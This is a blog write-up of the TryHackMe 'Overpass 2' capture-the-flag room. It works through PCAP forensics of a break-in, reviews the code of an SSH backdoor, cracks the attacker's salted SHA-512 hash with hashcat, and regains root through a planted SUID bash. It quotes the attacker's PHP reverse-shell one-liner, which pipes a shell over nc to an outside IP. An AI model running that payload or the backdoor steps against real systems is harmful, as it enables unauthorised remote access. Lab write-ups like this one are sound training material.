Home Overpass 2
Post
Cancel

Overpass 2

Posted Aug 19, 2022
By Thomas Kendrick
4 min read

Overpass 2 continues the story from Overpass 1, but in this case a hacker has exploited the weaknesses in the security of Overpass, and taken control of the website.

Task 1 - Forensics - Analyse the PCAP

This challenge has multiple tasks, the first is answering a series of questions about how this hacker gained access. I was provided with a .pcapng file to analyse to answer them.

  • What was the URL of the page they used to upload a reverse shell?
  • What payload did the attacker use to gain access?
  • What password did the attacker use to privesc?
  • How did the attacker establish persistence?
  • Using the fasttrack wordlist, how many of the system passwords were crackable?

Uploading the payload

A pcapng file is a dump of sniffed packets captured over a network. I can inspect this data using a tool like Wireshark.

Opening the file in Wireshark

Looking at the file we see a number of HTTP packets, notably a “POST” request to “/development/upload.php”. File uploads are a common way of gaining remote access, so I investigate the request further to see what was uploaded.

Following the conversation

Looking at this, we can see that the attacker posted a PHP reverse shell to the upload page.

1

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

I’ve got the answer to the first two questions now.

PrivEsc

Looking further at the HTTP packets we see that the attacker sent a “GET” request to this payload.php file in order to trigger the reverse shell.

We’d expect to see plaintext TCP packets showing what was sent, and indeed we see this.

How did they privesc

Taking a look at the shell session, the attacker cats out the contents of the “.overpass” file (the fictional password manager in this task), and uses to get the password of the ‘james’ user. They then switch to the “james” user with this password using the su command. Another question down.

Gaining persistence

Next, to find out how the attacker gained persistence. Persistence Looking at this section of the session, we see that (after catting the contents of the /etc/shadow file), they clone the contents of a backdoor, from a public Github repo. This repo is the answer to the final question of the first task.

Task 2 - Research - Analyse the code

We’ve now got access to the source code for the backdoor. For the second task we’re asked a number of questions.

  • What’s the default hash for the backdoor?
  • What’s the hardcoded salt for the backdoor?
  • What was the hash that the attacker used?
  • Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

Looking at the code

Looking at the repo, We can see that this backdoor spins up an SSH server. The default hash for the server is defined in a variable on line 19.

1

var hash string = "bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3"

There are also a couple of password related functions of interest,

1
2
3
4
5
6
7
8
9

...
func verifyPass(hash, salt, password string) bool {
	resultHash := hashPassword(password, salt)
	return resultHash == hash
}
...
func passwordHandler(_ ssh.Context, password string) bool {
	return verifyPass(hash, "1c362db832f3f864c8c2fe05f2002a05", password)
}

The verifyPass function takes a salt as its second argument, and the hardcoded value of 1c362db832f3f864c8c2fe05f2002a05 is passed, the answer to our second question.

The third question asked what hash the attacker used. Looking back at the PCAP, we see that the attack spins up the backdoor with the following command.

1

james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

Finally we’re asked to crack the hash using the rockyou.txt wordlist. I used hashcat for this.

From the backdoor code, we know that the hash is of type sha512, and that it is salted.

1
2
3
4

func hashPassword(password string, salt string) string {
	hash := sha512.Sum512([]byte(password + salt))
	return fmt.Sprintf("%x", hash)
}

Cracking the attackers hash We can use method 1710 from the as described in the hashcat docs to break this hash.

1

hashcat -m 1710 hash /usr/share/wordlists/rockyou.txt

Cracking the attackers hash

Task 3 - Attack - Get back in!

Finally, we need to regain access to the server. We’ve got another attack box to investigate. We need the answers to:

  • The attacker defaced the website. What message did they leave as a heading?
  • What’s the user flag?
  • What’s the root flag?

Vandalism

I get the answer to the first question pretty easily, the home page now looks like this Cracking the attackers hash

Regaining access

We know that the attacker used a backdoor SSH server on port 2222. Trying to login to this as the “james” user, I kept getting an error message.

1
2

$ ssh -p 2222 james@10.10.173.50
Unable to negotiate with 10.10.173.50 port 2222: no matching host key type found. Their offer: ssh-rsa

Turns out that that ssh-rsa has been depricated in versions of openssh >= 8.7.

I was able to workaround this with the following command

1

ssh -p 2222 james@10.10.173.50 -oHostKeyAlgorithms=+ssh-rsa

Now I had shell access for the james user, and could retrieve the user flag.

The james user did not appear to have sudo access, so I poked around a bit to see what the attacker had left behind. Cracking the attackers hash

We see the attacker left behind a .suid_bash file, owned by root, with a SUID bit set, presumably for easy escalation. If we run this binary with the -p flag, so that we retain the permissions of the owner of the file, we gain access to the root flag.

infosec, write-ups
overpass tryhackme
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Trending Tags
overpass tryhackme
Contents
Trending Tags
overpass tryhackme